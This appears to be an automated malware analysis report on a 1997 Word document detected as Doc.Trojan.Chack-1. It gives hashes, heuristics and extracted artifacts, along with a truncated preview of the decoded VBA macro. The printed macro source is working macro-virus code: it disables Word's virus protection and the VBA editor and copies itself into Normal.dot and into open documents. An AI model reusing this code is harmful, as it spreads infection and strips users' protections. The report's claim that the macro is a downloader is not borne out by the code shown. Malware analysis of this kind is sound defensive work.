Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7e67f660d6a51828…

MALICIOUS

Office (OLE)

266.0 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 280c7d69181192507efc837ce55b10e0 SHA-1: 6ea6b630d1a9babb5123bd717c93b5c7afcee05e SHA-256: 7e67f660d6a51828c4cf99d9ae7cc546c9df7cfc18ddcafda74b0579944ff6ab
320 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically an AutoOpen macro, which is a common technique for executing malicious code upon opening a document. The ClamAV detection (Doc.Trojan.Chack-1) and the presence of embedded OLE objects further indicate malicious intent. The VBA macro's purpose appears to be downloading and executing a secondary payload, as suggested by the heuristic firings and the nature of the macro code.

Heuristics 7

  • ClamAV: Doc.Trojan.Chack-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Chack-1
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 232,931 bytes but its declared streams total only 0 bytes — 232,931 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18892 bytes
SHA-256: 926faff4aa012490ff2c762e8892288ab281e9a781381d4eaf010ceacd673c25
Detection
ClamAV: Doc.Trojan.Chack-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Superjc"
' Macros By JC'S Hacker
' Esto es lo bello que se aprende también a parte de lo mecánico de la Universidad
' JTBH anywhere that you are, you should remember me, uniquely I wish them that all the world Knew that I him Love, and that nothing will do forget her
' and live those that wonderful thet is the love, but never you will find to nothing like as me
' I was your married, of that you never will forget.
' Con muchisimo Orgullo THE-EPN-SNF-XX-CB desde algún rincon del planeta para, todo el mundo
' Felicidades or Happyness Datafellows, I hope that you can kill this bug early before infect so much machines Good Luck

Public Inicial
Public Salva
Public Infecta
Public Infdocum
Sub JCstart()
    Inicial = Application.DisplayAlerts
    Application.DisplayAlerts = wdAlertsNone
    Call Inhab
    WordBasic.DisableAutoMacros 0
    CommandBars("Visual Basic").Visible = False
    CommandBars("Visual Basic").Enabled = False
    CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
    CommandBars("Visual Basic").Protection = msoBarNoCustomize
    On Error Resume Next
    CommandBars("Tools").Controls("Macro").Delete
    CustomizationContext = NormalTemplate
    FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
    FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
    On Error GoTo 0
End Sub
Sub JCfinal()
Application.DisplayAlerts = Inicial
End Sub
Sub VerinfNorm()
    Call Inhab
    On Error GoTo Step1
    Infecta = False
    Set AD = ActiveDocument
    Set NT = NormalTemplate
    On Error GoTo Step2
    For i = 1 To NT.VBProject.VBComponents.Count
      NMacr = NT.VBProject.VBComponents(i).Name
      If NMacr = "Superjc" Then Infecta = True
      If (NMacr <> "Superjc") And (NMacr <> "SPJC") And (NMacr <> "ThisDocument") Then
        Application.OrganizerDelete Source:=NT.FullName, _
            Name:=NMacr, Object:=wdOrganizerObjectProjectItems
      End If
    Next i
Step2:
    If Infecta = False Then
      On Error GoTo Step3
      Application.OrganizerCopy Source:=AD.FullName, _
          Destination:=NT.FullName, Name:= _
          "Superjc", Object:=wdOrganizerObjectProjectItems
      Application.OrganizerCopy Source:=AD.FullName, _
          Destination:=NT.FullName, Name:= _
          "SPJC", Object:=wdOrganizerObjectProjectItems
      Templates(NT.FullName).Save
Step3:
    End If
Step1:
End Sub
Sub InfectNor()
    On Error GoTo Step4
    Salva = 0
    Infdocum = False
    Set AD = ActiveDocument
    Set NT = NormalTemplate
    On Error GoTo Step5
    For i = 1 To AD.VBProject.VBComponents.Count
      NMacr = AD.VBProject.VBComponents(i).Name
      If NMacr = "Superjc" Then Infdocum = True
      NMacr = NT.VBProject.VBComponents(i).Name
      If NMacr = "Superjc" Then Infdocum = True
      On Error GoTo Step5
      If (NMacr <> "Superjc") And (NMacr <> "SPJC") And _
        (NMacr <> "ThisDocument") And (NMacr <> "Reference to Normal") And _
        (NMacr <> "ThisDocument") And (NMacr <> "Referencia a Normal") Then
        Application.OrganizerDelete Source:=AD.FullName, _
          Name:=NMacr, Object:=wdOrganizerObjectProjectItems
      End If
    Next i
Step5:
    If Infdocum = False Then
      On Error GoTo Step6
      Application.OrganizerCopy Source:=NT.FullName, _
          Destination:=AD.FullName, Name:= _
          "Superjc", Object:=wdOrganizerObjectProjectItems
      Application.OrganizerCopy Source:=NT.FullName, _
          Destination:=AD.FullName, Name:= _
          "SPJC", Object:=wdOrganizerObjectProjectItems
      Salva = 1
Step6:
    End If
Step4:
End Sub
Sub SUPERJC()
    Call JCstart
    Call VerinfNorm
    Call JCfinal
End Sub
Sub Inhab()
    With Options
        .VirusProtection = False
        .SaveNormalPrompt = Fals
... (truncated)
embedded_office_off00009a1d.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x9A1D 232931 bytes
SHA-256: edbc79f90b13011c930f02c5d52d3e0126924ffb2e1509dbf86558a861085fbd
embedded_office_off0000a50d.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0xA50D 230131 bytes
SHA-256: 6794a295c09eb72ceeac0bcf01bc67363d29089f985ae8083dab8657bf361bdd

Open this report in the interactive analyzer, or submit your own file for analysis.